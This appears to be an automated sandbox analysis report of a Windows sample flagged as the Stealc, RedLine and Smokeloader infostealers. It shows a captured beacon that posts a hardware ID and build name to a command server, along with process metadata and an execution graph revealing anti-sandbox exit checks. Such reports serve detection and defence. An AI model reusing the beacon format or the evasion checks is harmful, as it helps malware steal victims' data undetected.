                                      Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 46 39 44 34 31 33 37 35 44 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 2d 2d 0d 0a
                                      Data Ascii: ------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="hwid"4F9D41375D0C3886582548------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="build"LogsDiller------CFBFCGIDAKECGCBGDBAF--
                                      Oct 24, 2024 21:32:00.377867937 CEST210INHTTP/1.1 200 OK
                                      Date: Thu, 24 Oct 2024 19:32:00 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:15:31:57
                                      Start date:24/10/2024
                                      Path:C:\Users\user\Desktop\hi2jR57Z15.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\hi2jR57Z15.exe"
                                      Imagebase:0x400000
                                      File size:404'480 bytes
                                      MD5 hash:CA46940F226CAD8C3123F7505FCAD8A7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1924882447.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1692629472.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:15:32:00
                                      Start date:24/10/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1044
                                      Imagebase:0xc50000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:6.2%
                                        Dynamic/Decrypted Code Coverage:68.5%
                                        Signature Coverage:12.6%
                                        Total number of Nodes:1426
                                        Total number of Limit Nodes:27
                                        execution_graph 30214 409440 strlen malloc strcpy_s free std::exception::exception 30252 22e932a ??2@YAPAXI RaiseException allocator 30172 801189 30173 801198 30172->30173 30176 801929 30173->30176 30177 801944 30176->30177 30178 80194d CreateToolhelp32Snapshot 30177->30178 30179 801969 Module32First 30177->30179 30178->30177 30178->30179 30180 801978 30179->30180 30182 8011a1 30179->30182 30183 8015e8 30180->30183 30184 801613 30183->30184 30185 801624 VirtualAlloc 30184->30185 30186 80165c 30184->30186 30185->30186 30273 41ce48 LeaveCriticalSection __initptd 30314 22f1525 strtok_s strtok_s lstrlen lstrcpy ctype 30216 41b050 6 API calls 3 library calls 30254 22e9b37 7 API calls 30277 22f1c35 110 API calls 30317 406f60 memcpy 30218 41dc60 atexit 30319 410765 279 API calls 30219 22f6a0a ExitProcess 30278 417667 lstrcpy 30320 22fd106 41 API calls __amsg_exit 30187 22e0005 30192 22e092b GetPEB 30187->30192 30189 22e0030 30193 22e003c 30189->30193 30192->30189 30194 22e0049 30193->30194 30208 22e0e0f SetErrorMode SetErrorMode 30194->30208 30199 22e0265 30200 22e02ce VirtualProtect 30199->30200 30202 22e030b 30200->30202 30201 22e0439 VirtualFree 30206 22e05f4 LoadLibraryA 30201->30206 30207 22e04be 30201->30207 30202->30201 30203 22e04e3 LoadLibraryA 30203->30207 30205 22e08c7 30206->30205 30207->30203 30207->30206 30209 22e0223 30208->30209 30210 22e0d90 30209->30210 30211 22e0dad 30210->30211 30212 22e0dbb GetPEB 30211->30212 30213 22e0238 VirtualAlloc 30211->30213 30212->30213 30213->30199 30279 41b270 5 API calls 2 library calls 30223 22f15b3 18 API calls ctype 30322 22efd67 152 API calls 30224 41bc11 71 API calls 2 library calls 30225 22fbe78 162 API calls 2 library calls 30226 22fcd97 170 API calls 2 library calls 30324 230e553 __scrt_dllmain_crt_thread_attach __scrt_initialize_crt __scrt_get_show_window_mode __scrt_acquire_startup_lock __scrt_release_startup_lock 30227 22f3b7d 91 API calls 2 library calls 30228 41ac2c 71 API calls 2 library calls 30229 22f6a40 6 API calls 30326 22f6d18 643 API calls 30285 22f102b strtok_s lstrlen lstrcpy 30286 22f6c57 689 API calls 30287 22f140b strtok_s 30289 22fd0af RtlLeaveCriticalSection _raise 30230 22f32ae 22 API calls 30231 4090c3 5 API calls allocator 30290 22f140b StrCmpCA strtok_s 30328 22fcd90 173 API calls 3 library calls 30329 41abd0 free codecvt std::exception::_Tidy 30233 22e6ebc VirtualProtect 30292 22f04b7 88 API calls 30293 22f0cb6 30 API calls 30331 413916 91 API calls 2 library calls 30332 4183dc 15 API calls 30333 22fcd8f 6 API calls 2 library calls 30294 22f102b StrCmpCA strtok_s lstrlen lstrcpy 30334 22f118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 30237 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 30296 41ceea SetUnhandledExceptionFilter 30297 22f3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 28754 4169f0 28797 402260 28754->28797 28771 417850 3 API calls 28772 416a30 28771->28772 28773 4178e0 3 API calls 28772->28773 28774 416a43 28773->28774 28930 41a9b0 28774->28930 28776 416a64 28777 41a9b0 4 API calls 28776->28777 28778 416a6b 28777->28778 28779 41a9b0 4 API calls 28778->28779 28780 416a72 28779->28780 28781 41a9b0 4 API calls 28780->28781 28782 416a79 28781->28782 28783 41a9b0 4 API calls 28782->28783 28784 416a80 28783->28784 28938 41a8a0 28784->28938 28786 416b0c 28942 416920 GetSystemTime 28786->28942 28787 416a89 28787->28786 28789 416ac2 OpenEventA 28787->28789 28791 416af5 CloseHandle Sleep 28789->28791 28792 416ad9 28789->28792 28794 416b0a 28791->28794 28796 416ae1 CreateEventA 28792->28796 28794->28787 28795 416b16 CloseHandle ExitProcess 28796->28786 29137 4045c0 17 API calls 28797->29137 28799 402274 28800 4045c0 34 API calls 28799->28800 28801 40228d 28800->28801 28802 4045c0 34 API calls 28801->28802 28803 4022a6 28802->28803 28804 4045c0 34 API calls 28803->28804 28805 4022bf 28804->28805 28806 4045c0 34 API calls 28805->28806 28807 4022d8 28806->28807 28808 4045c0 34 API calls 28807->28808 28809 4022f1 28808->28809 28810 4045c0 34 API calls 28809->28810 28811 40230a 28810->28811 28812 4045c0 34 API calls 28811->28812 28813 402323 28812->28813 28814 4045c0 34 API calls 28813->28814 28815 40233c 28814->28815 28816 4045c0 34 API calls 28815->28816 28817 402355 28816->28817 28818 4045c0 34 API calls 28817->28818 28819 40236e 28818->28819 28820 4045c0 34 API calls 28819->28820 28821 402387 28820->28821 28822 4045c0 34 API calls 28821->28822 28823 4023a0 28822->28823 28824 4045c0 34 API calls 28823->28824 28825 4023b9 28824->28825 28826 4045c0 34 API calls 28825->28826 28827 4023d2 28826->28827 28828 4045c0 34 API calls 28827->28828 28829 4023eb 28828->28829 28830 4045c0 34 API calls 28829->28830 28831 402404 28830->28831 28832 4045c0 34 API calls 28831->28832 28833 40241d 28832->28833 28834 4045c0 34 API calls 28833->28834 28835 402436 28834->28835 28836 4045c0 34 API calls 28835->28836 28837 40244f 28836->28837 28838 4045c0 34 API calls 28837->28838 28839 402468 28838->28839 28840 4045c0 34 API calls 28839->28840 28841 402481 28840->28841 28842 4045c0 34 API calls 28841->28842 28843 40249a 28842->28843 28844 4045c0 34 API calls 28843->28844 28845 4024b3 28844->28845 28846 4045c0 34 API calls 28845->28846 28847 4024cc 28846->28847 28848 4045c0 34 API calls 28847->28848 28849 4024e5 28848->28849 28850 4045c0 34 API calls 28849->28850 28851 4024fe 28850->28851 28852 4045c0 34 API calls 28851->28852 28853 402517 28852->28853 28854 4045c0 34 API calls 28853->28854 28855 402530 28854->28855 28856 4045c0 34 API calls 28855->28856 28857 402549 28856->28857 28858 4045c0 34 API calls 28857->28858 28859 402562 28858->28859 28860 4045c0 34 API calls 28859->28860 28861 40257b 28860->28861 28862 4045c0 34 API calls 28861->28862 28863 402594 28862->28863 28864 4045c0 34 API calls 28863->28864 28865 4025ad 28864->28865 28866 4045c0 34 API calls 28865->28866 28867 4025c6 28866->28867 28868 4045c0 34 API calls 28867->28868 28869 4025df 28868->28869 28870 4045c0 34 API calls 28869->28870 28871 4025f8 28870->28871 28872 4045c0 34 API calls 28871->28872 28873 402611 28872->28873 28874 4045c0 34 API calls 28873->28874 28875 40262a 28874->28875 28876 4045c0 34 API calls 28875->28876 28877 402643 28876->28877 28878 4045c0 34 API calls 28877->28878 28879 40265c 28878->28879 28880 4045c0 34 API calls 28879->28880 28881 402675 28880->28881 28882 4045c0 34 API calls 28881->28882 28883 40268e 28882->28883 28884 419860 28883->28884 29141 419750 GetPEB 28884->29141 28886 419868 28887 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 28886->28887 28888 41987a 28886->28888 28889 419af4 GetProcAddress 28887->28889 28890 419b0d 28887->28890 28893 41988c 21 API calls 28888->28893 28889->28890 28891 419b46 28890->28891 28892 419b16 GetProcAddress GetProcAddress 28890->28892 28894 419b68 28891->28894 28895 419b4f GetProcAddress 28891->28895 28892->28891 28893->28887 28896 419b71 GetProcAddress 28894->28896 28897 419b89 28894->28897 28895->28894 28896->28897 28898 416a00 28897->28898 28899 419b92 GetProcAddress GetProcAddress 28897->28899 28900 41a740 28898->28900 28899->28898 28901 41a750 28900->28901 28902 416a0d 28901->28902 28903 41a77e lstrcpy 28901->28903 28904 4011d0 28902->28904 28903->28902 28905 4011e8 28904->28905 28906 401217 28905->28906 28907 40120f ExitProcess 28905->28907 28908 401160 GetSystemInfo 28906->28908 28909 401184 28908->28909 28910 40117c ExitProcess 28908->28910 28911 401110 GetCurrentProcess VirtualAllocExNuma 28909->28911 28912 401141 ExitProcess 28911->28912 28913 401149 28911->28913 29142 4010a0 VirtualAlloc 28913->29142 28916 401220 29146 4189b0 28916->29146 28919 401249 __aulldiv 28920 40129a 28919->28920 28921 401292 ExitProcess 28919->28921 28922 416770 GetUserDefaultLangID 28920->28922 28923 4167d3 GetUserDefaultLCID 28922->28923 28924 416792 28922->28924 28923->28771 28924->28923 28925 4167c1 ExitProcess 28924->28925 28926 4167a3 ExitProcess 28924->28926 28927 4167b7 ExitProcess 28924->28927 28928 4167cb ExitProcess 28924->28928 28929 4167ad ExitProcess 28924->28929 29148 41a710 28930->29148 28932 41a9c1 lstrlenA 28933 41a9e0 28932->28933 28934 41aa18 28933->28934 28936 41a9fa lstrcpy lstrcatA 28933->28936 29149 41a7a0 28934->29149 28936->28934 28937 41aa24 28937->28776 28939 41a8bb 28938->28939 28940 41a90b 28939->28940 28941 41a8f9 lstrcpy 28939->28941 28940->28787 28941->28940 29153 416820 28942->29153 28944 41698e 28945 416998 sscanf 28944->28945 29182 41a800 28945->29182 28947 4169aa SystemTimeToFileTime SystemTimeToFileTime 28948 4169e0 28947->28948 28949 4169ce 28947->28949 28951 415b10 28948->28951 28949->28948 28950 4169d8 ExitProcess 28949->28950 28952 415b1d 28951->28952 28953 41a740 lstrcpy 28952->28953 28954 415b2e 28953->28954 29184 41a820 lstrlenA 28954->29184 28957 41a820 2 API calls 28958 415b64 28957->28958 28959 41a820 2 API calls 28958->28959 28960 415b74 28959->28960 29188 416430 28960->29188 28963 41a820 2 API calls 28964 415b93 28963->28964 28965 41a820 2 API calls 28964->28965 28966 415ba0 28965->28966 28967 41a820 2 API calls 28966->28967 28968 415bad 28967->28968 28969 41a820 2 API calls 28968->28969 28970 415bf9 28969->28970 29197 4026a0 28970->29197 28978 415cc3 28979 416430 lstrcpy 28978->28979 28980 415cd5 28979->28980 28981 41a7a0 lstrcpy 28980->28981 28982 415cf2 28981->28982 28983 41a9b0 4 API calls 28982->28983 28984 415d0a 28983->28984 28985 41a8a0 lstrcpy 28984->28985 28986 415d16 28985->28986 28987 41a9b0 4 API calls 28986->28987 28988 415d3a 28987->28988 28989 41a8a0 lstrcpy 28988->28989 28990 415d46 28989->28990 28991 41a9b0 4 API calls 28990->28991 28992 415d6a 28991->28992 28993 41a8a0 lstrcpy 28992->28993 28994 415d76 28993->28994 28995 41a740 lstrcpy 28994->28995 28996 415d9e 28995->28996 29923 417500 GetWindowsDirectoryA 28996->29923 28999 41a7a0 lstrcpy 29000 415db8 28999->29000 29933 404880 29000->29933 29002 415dbe 30078 4117a0 29002->30078 29004 415dc6 29005 41a740 lstrcpy 29004->29005 29006 415de9 29005->29006 29007 401590 lstrcpy 29006->29007 29008 415dfd 29007->29008 30098 405960 39 API calls codecvt 29008->30098 29010 415e03 30099 411050 strtok_s strtok_s lstrlenA lstrcpy 29010->30099 29012 415e0e 29013 41a740 lstrcpy 29012->29013 29014 415e32 29013->29014 29015 401590 lstrcpy 29014->29015 29016 415e46 29015->29016 30100 405960 39 API calls codecvt 29016->30100 29018 415e4c 30101 410d90 7 API calls 29018->30101 29020 415e57 29021 41a740 lstrcpy 29020->29021 29022 415e79 29021->29022 29023 401590 lstrcpy 29022->29023 29024 415e8d 29023->29024 30102 405960 39 API calls codecvt 29024->30102 29026 415e93 30103 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 29026->30103 29028 415e9e 29029 401590 lstrcpy 29028->29029 29030 415eb5 29029->29030 30104 411a10 121 API calls 29030->30104 29032 415eba 29033 41a740 lstrcpy 29032->29033 29034 415ed6 29033->29034 30105 404fb0 8 API calls 29034->30105 29036 415edb 29037 401590 lstrcpy 29036->29037 29038 415f5b 29037->29038 30106 410740 292 API calls 29038->30106 29040 415f60 29041 41a740 lstrcpy 29040->29041 29042 415f86 29041->29042 29043 401590 lstrcpy 29042->29043 29044 415f9a 29043->29044 30107 405960 39 API calls codecvt 29044->30107 29046 415fa0 30108 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 29046->30108 29048 415fab 29049 401590 lstrcpy 29048->29049 29050 415feb 29049->29050 30109 401e80 67 API calls 29050->30109 29052 415ff0 29053 416000 29052->29053 29054 416092 29052->29054 29056 41a740 lstrcpy 29053->29056 29055 41a7a0 lstrcpy 29054->29055 29057 4160a5 29055->29057 29058 416020 29056->29058 29059 401590 lstrcpy 29057->29059 29060 401590 lstrcpy 29058->29060 29061 4160b9 29059->29061 29062 416034 29060->29062 30113 405960 39 API calls codecvt 29061->30113 30110 405960 39 API calls codecvt 29062->30110 29065 4160bf 30114 413560 36 API calls 29065->30114 29066 41603a 30111 4112d0 21 API calls codecvt 29066->30111 29069 416045 29071 401590 lstrcpy 29069->29071 29070 41608a 29073 41610b 29070->29073 29074 401590 lstrcpy 29070->29074 29072 416085 29071->29072 30112 413dc0 75 API calls 29072->30112 29076 416130 29073->29076 29078 401590 lstrcpy 29073->29078 29077 4160e7 29074->29077 29079 416155 29076->29079 29080 401590 lstrcpy 29076->29080 30115 4140b0 64 API calls codecvt 29077->30115 29083 41612b 29078->29083 29082 41617a 29079->29082 29086 401590 lstrcpy 29079->29086 29084 416150 29080->29084 29087 41619f 29082->29087 29092 401590 lstrcpy 29082->29092 30117 414780 116 API calls codecvt 29083->30117 30118 414bb0 67 API calls codecvt 29084->30118 29085 4160ec 29090 401590 lstrcpy 29085->29090 29091 416175 29086->29091 29093 401590 lstrcpy 29087->29093 29098 4161bf 29087->29098 29094 416106 29090->29094 30119 414d70 75 API calls 29091->30119 29097 41619a 29092->29097 29093->29098 30116 415100 71 API calls 29094->30116 29095 4161e9 29101 416210 29095->29101 29106 401590 lstrcpy 29095->29106 30120 414f40 69 API calls codecvt 29097->30120 29098->29095 29100 401590 lstrcpy 29098->29100 29105 4161e4 29100->29105 29103 416220 29101->29103 29104 4162b3 29101->29104 29108 41a740 lstrcpy 29103->29108 29107 41a7a0 lstrcpy 29104->29107 30121 415050 67 API calls codecvt 29105->30121 29110 416209 29106->29110 29112 4162c6 29107->29112 29113 416241 29108->29113 30122 419010 54 API calls codecvt 29110->30122 29114 401590 lstrcpy 29112->29114 29115 401590 lstrcpy 29113->29115 29116 4162da 29114->29116 29117 416255 29115->29117 30126 405960 39 API calls codecvt 29116->30126 30123 405960 39 API calls codecvt 29117->30123 29120 4162e0 30127 413560 36 API calls 29120->30127 29121 41625b 30124 4112d0 21 API calls codecvt 29121->30124 29124 4162ab 29127 41a7a0 lstrcpy 29124->29127 29125 416266 29126 401590 lstrcpy 29125->29126 29128 4162a6 29126->29128 29129 4162fc 29127->29129 30125 413dc0 75 API calls 29128->30125 29131 401590 lstrcpy 29129->29131 29132 416310 29131->29132 30128 405960 39 API calls codecvt 29132->30128 29134 41631c 29136 416338 29134->29136 30129 416630 9 API calls codecvt 29134->30129 29136->28795 29138 404697 29137->29138 29139 4046ac 11 API calls 29138->29139 29140 40474f 6 API calls 29138->29140 29139->29138 29140->28799 29141->28886 29143 4010c2 codecvt 29142->29143 29144 4010fd 29143->29144 29145 4010e2 VirtualFree 29143->29145 29144->28916 29145->29144 29147 401233 GlobalMemoryStatusEx 29146->29147 29147->28919 29148->28932 29150 41a7c2 29149->29150 29151 41a7ec 29150->29151 29152 41a7da lstrcpy 29150->29152 29151->28937 29152->29151 29154 41a740 lstrcpy 29153->29154 29155 416833 29154->29155 29156 41a9b0 4 API calls 29155->29156 29157 416845 29156->29157 29158 41a8a0 lstrcpy 29157->29158 29159 41684e 29158->29159 29160 41a9b0 4 API calls 29159->29160 29161 416867 29160->29161 29162 41a8a0 lstrcpy 29161->29162 29163 416870 29162->29163 29164 41a9b0 4 API calls 29163->29164 29165 41688a 29164->29165 29166 41a8a0 lstrcpy 29165->29166 29167 416893 29166->29167 29168 41a9b0 4 API calls 29167->29168 29169 4168ac 29168->29169 29170 41a8a0 lstrcpy 29169->29170 29171 4168b5 29170->29171 29172 41a9b0 4 API calls 29171->29172 29173 4168cf 29172->29173 29174 41a8a0 lstrcpy 29173->29174 29175 4168d8 29174->29175 29176 41a9b0 4 API calls 29175->29176 29177 4168f3 29176->29177 29178 41a8a0 lstrcpy 29177->29178 29179 4168fc 29178->29179 29180 41a7a0 lstrcpy 29179->29180 29181 416910 29180->29181 29181->28944 29183 41a812 29182->29183 29183->28947 29185 41a83f 29184->29185 29186 415b54 29185->29186 29187 41a87b lstrcpy 29185->29187 29186->28957 29187->29186 29189 41a8a0 lstrcpy 29188->29189 29190 416443 29189->29190 29191 41a8a0 lstrcpy 29190->29191 29192 416455 29191->29192 29193 41a8a0 lstrcpy 29192->29193 29194 416467 29193->29194 29195 41a8a0 lstrcpy 29194->29195 29196 415b86 29195->29196 29196->28963 29198 4045c0 34 API calls 29197->29198 29199 4026b4 29198->29199 29200 4045c0 34 API calls 29199->29200 29201 4026d7 29200->29201 29202 4045c0 34 API calls 29201->29202 29203 4026f0 29202->29203 29204 4045c0 34 API calls 29203->29204 29205 402709 29204->29205 29206 4045c0 34 API calls 29205->29206 29207 402736 29206->29207 29208 4045c0 34 API calls 29207->29208 29209 40274f 29208->29209 29210 4045c0 34 API calls 29209->29210 29211 402768 29210->29211 29212 4045c0 34 API calls 29211->29212 29213 402795 29212->29213 29214 4045c0 34 API calls 29213->29214 29215 4027ae 29214->29215 29216 4045c0 34 API calls 29215->29216 29217 4027c7 29216->29217 29218 4045c0 34 API calls 29217->29218 29219 4027e0 29218->29219 29220 4045c0 34 API calls 29219->29220 29221 4027f9 29220->29221 29222 4045c0 34 API calls 29221->29222 29223 402812 29222->29223 29224 4045c0 34 API calls 29223->29224 29225 40282b 29224->29225 29226 4045c0 34 API calls 29225->29226 29227 402844 29226->29227 29228 4045c0 34 API calls 29227->29228 29229 40285d 29228->29229 29230 4045c0 34 API calls 29229->29230 29231 402876 29230->29231 29232 4045c0 34 API calls 29231->29232 29233 40288f 29232->29233 29234 4045c0 34 API calls 29233->29234 29235 4028a8 29234->29235 29236 4045c0 34 API calls 29235->29236 29237 4028c1 29236->29237 29238 4045c0 34 API calls 29237->29238 29239 4028da 29238->29239 29240 4045c0 34 API calls 29239->29240 29241 4028f3 29240->29241 29242 4045c0 34 API calls 29241->29242 29243 40290c 29242->29243 29244 4045c0 34 API calls 29243->29244 29245 402925 29244->29245 29246 4045c0 34 API calls 29245->29246 29247 40293e 29246->29247 29248 4045c0 34 API calls 29247->29248 29249 402957 29248->29249 29250 4045c0 34 API calls 29249->29250 29251 402970 29250->29251 29252 4045c0 34 API calls 29251->29252 29253 402989 29252->29253 29254 4045c0 34 API calls 29253->29254 29255 4029a2 29254->29255 29256 4045c0 34 API calls 29255->29256 29257 4029bb 29256->29257 29258 4045c0 34 API calls 29257->29258 29259 4029d4 29258->29259 29260 4045c0 34 API calls 29259->29260 29261 4029ed 29260->29261 29262 4045c0 34 API calls 29261->29262 29263 402a06 29262->29263 29264 4045c0 34 API calls 29263->29264 29265 402a1f 29264->29265 29266 4045c0 34 API calls 29265->29266 29267 402a38 29266->29267 29268 4045c0 34 API calls 29267->29268 29269 402a51 29268->29269 29270 4045c0 34 API calls 29269->29270 29271 402a6a 29270->29271 29272 4045c0 34 API calls 29271->29272 29273 402a83 29272->29273 29274 4045c0 34 API calls 29273->29274 29275 402a9c 29274->29275 29276 4045c0 34 API calls 29275->29276 29277 402ab5 29276->29277 29278 4045c0 34 API calls 29277->29278 29279 402ace 29278->29279 29280 4045c0 34 API calls 29279->29280 29281 402ae7 29280->29281 29282 4045c0 34 API calls 29281->29282 29283 402b00 29282->29283 29284 4045c0 34 API calls 29283->29284 29285 402b19 29284->29285 29286 4045c0 34 API calls 29285->29286 29287 402b32 29286->29287 29288 4045c0 34 API calls 29287->29288 29289 402b4b 29288->29289 29290 4045c0 34 API calls 29289->29290 29291 402b64 29290->29291 29292 4045c0 34 API calls 29291->29292 29293 402b7d 29292->29293 29294 4045c0 34 API calls 29293->29294 29295 402b96 29294->29295 29296 4045c0 34 API calls 29295->29296 29297 402baf 29296->29297 29298 4045c0 34 API calls 29297->29298 29299 402bc8 29298->29299 29300 4045c0 34 API calls 29299->29300 29301 402be1 29300->29301 29302 4045c0 34 API calls 29301->29302 29303 402bfa 29302->29303 29304 4045c0 34 API calls 29303->29304 29305 402c13 29304->29305 29306 4045c0 34 API calls 29305->29306 29307 402c2c 29306->29307 29308 4045c0 34 API calls 29307->29308 29309 402c45 29308->29309 29310 4045c0 34 API calls 29309->29310 29311 402c5e 29310->29311 29312 4045c0 34 API calls 29311->29312 29313 402c77 29312->29313 29314 4045c0 34 API calls 29313->29314 29315 402c90 29314->29315 29316 4045c0 34 API calls 29315->29316 29317 402ca9 29316->29317 29318 4045c0 34 API calls 29317->29318 29319 402cc2 29318->29319 29320 4045c0 34 API calls 29319->29320 29321 402cdb 29320->29321 29322 4045c0 34 API calls 29321->29322 29323 402cf4 29322->29323 29324 4045c0 34 API calls 29323->29324 29325 402d0d 29324->29325 29326 4045c0 34 API calls 29325->29326 29327 402d26 29326->29327 29328 4045c0 34 API calls 29327->29328 29329 402d3f 29328->29329 29330 4045c0 34 API calls 29329->29330 29331 402d58 29330->29331 29332 4045c0 34 API calls 29331->29332 29333 402d71 29332->29333 29334 4045c0 34 API calls 29333->29334 29335 402d8a 29334->29335 29336 4045c0 34 API calls 29335->29336 29337 402da3 29336->29337 29338 4045c0 34 API calls 29337->29338 29339 402dbc 29338->29339 29340 4045c0 34 API calls 29339->29340 29341 402dd5 29340->29341 29342 4045c0 34 API calls 29341->29342 29343 402dee 29342->29343 29344 4045c0 34 API calls 29343->29344 29345 402e07 29344->29345 29346 4045c0 34 API calls 29345->29346 29347 402e20 29346->29347 29348 4045c0 34 API calls 29347->29348 29349 402e39 29348->29349 29350 4045c0 34 API calls 29349->29350 29351 402e52 29350->29351 29352 4045c0 34 API calls 29351->29352 29353 402e6b 29352->29353 29354 4045c0 34 API calls 29353->29354 29355 402e84 29354->29355 29356 4045c0 34 API calls 29355->29356 29357 402e9d 29356->29357 29358 4045c0 34 API calls 29357->29358 29359 402eb6 29358->29359 29360 4045c0 34 API calls 29359->29360 29361 402ecf 29360->29361 29362 4045c0 34 API calls 29361->29362 29363 402ee8 29362->29363 29364 4045c0 34 API calls 29363->29364 29365 402f01 29364->29365 29366 4045c0 34 API calls 29365->29366 29367 402f1a 29366->29367 29368 4045c0 34 API calls 29367->29368 29369 402f33 29368->29369 29370 4045c0 34 API calls 29369->29370 29371 402f4c 29370->29371 29372 4045c0 34 API calls 29371->29372 29373 402f65 29372->29373 29374 4045c0 34 API calls 29373->29374 29375 402f7e 29374->29375 29376 4045c0 34 API calls 29375->29376 29377 402f97 29376->29377 29378 4045c0 34 API calls 29377->29378 29379 402fb0 29378->29379 29380 4045c0 34 API calls 29379->29380 29381 402fc9 29380->29381 29382 4045c0 34 API calls 29381->29382 29383 402fe2 29382->29383 29384 4045c0 34 API calls 29383->29384 29385 402ffb 29384->29385 29386 4045c0 34 API calls 29385->29386 29387 403014 29386->29387 29388 4045c0 34 API calls 29387->29388 29389 40302d 29388->29389 29390 4045c0 34 API calls 29389->29390 29391 403046 29390->29391 29392 4045c0 34 API calls 29391->29392 29393 40305f 29392->29393 29394 4045c0 34 API calls 29393->29394 29395 403078 29394->29395 29396 4045c0 34 API calls 29395->29396 29397 403091 29396->29397 29398 4045c0 34 API calls 29397->29398 29399 4030aa 29398->29399 29400 4045c0 34 API calls 29399->29400 29401 4030c3 29400->29401 29402 4045c0 34 API calls 29401->29402 29403 4030dc 29402->29403 29404 4045c0 34 API calls 29403->29404 29405 4030f5 29404->29405 29406 4045c0 34 API calls 29405->29406 29407 40310e 29406->29407 29408 4045c0 34 API calls 29407->29408 29409 403127 29408->29409 29410 4045c0 34 API calls 29409->29410 29411 403140 29410->29411 29412 4045c0 34 API calls 29411->29412 29413 403159 29412->29413 29414 4045c0 34 API calls 29413->29414 29415 403172 29414->29415 29416 4045c0 34 API calls 29415->29416 29417 40318b 29416->29417 29418 4045c0 34 API calls 29417->29418 29419 4031a4 29418->29419 29420 4045c0 34 API calls 29419->29420 29421 4031bd 29420->29421 29422 4045c0 34 API calls 29421->29422 29423 4031d6 29422->29423 29424 4045c0 34 API calls 29423->29424 29425 4031ef 29424->29425 29426 4045c0 34 API calls 29425->29426 29427 403208 29426->29427 29428 4045c0 34 API calls 29427->29428 29429 403221 29428->29429 29430 4045c0 34 API calls 29429->29430 29431 40323a 29430->29431 29432 4045c0 34 API calls 29431->29432 29433 403253 29432->29433 29434 4045c0 34 API calls 29433->29434 29435 40326c 29434->29435 29436 4045c0 34 API calls 29435->29436 29437 403285 29436->29437 29438 4045c0 34 API calls 29437->29438 29439 40329e 29438->29439 29440 4045c0 34 API calls 29439->29440 29441 4032b7 29440->29441 29442 4045c0 34 API calls 29441->29442 29443 4032d0 29442->29443 29444 4045c0 34 API calls 29443->29444 29445 4032e9 29444->29445 29446 4045c0 34 API calls 29445->29446 29447 403302 29446->29447 29448 4045c0 34 API calls 29447->29448 29449 40331b 29448->29449 29450 4045c0 34 API calls 29449->29450 29451 403334 29450->29451 29452 4045c0 34 API calls 29451->29452 29453 40334d 29452->29453 29454 4045c0 34 API calls 29453->29454 29455 403366 29454->29455 29456 4045c0 34 API calls 29455->29456 29457 40337f 29456->29457 29458 4045c0 34 API calls 29457->29458 29459 403398 29458->29459 29460 4045c0 34 API calls 29459->29460 29461 4033b1 29460->29461 29462 4045c0 34 API calls 29461->29462 29463 4033ca 29462->29463 29464 4045c0 34 API calls 29463->29464 29465 4033e3 29464->29465 29466 4045c0 34 API calls 29465->29466 29467 4033fc 29466->29467 29468 4045c0 34 API calls 29467->29468 29469 403415 29468->29469 29470 4045c0 34 API calls 29469->29470 29471 40342e 29470->29471 29472 4045c0 34 API calls 29471->29472 29473 403447 29472->29473 29474 4045c0 34 API calls 29473->29474 29475 403460 29474->29475 29476 4045c0 34 API calls 29475->29476 29477 403479 29476->29477 29478 4045c0 34 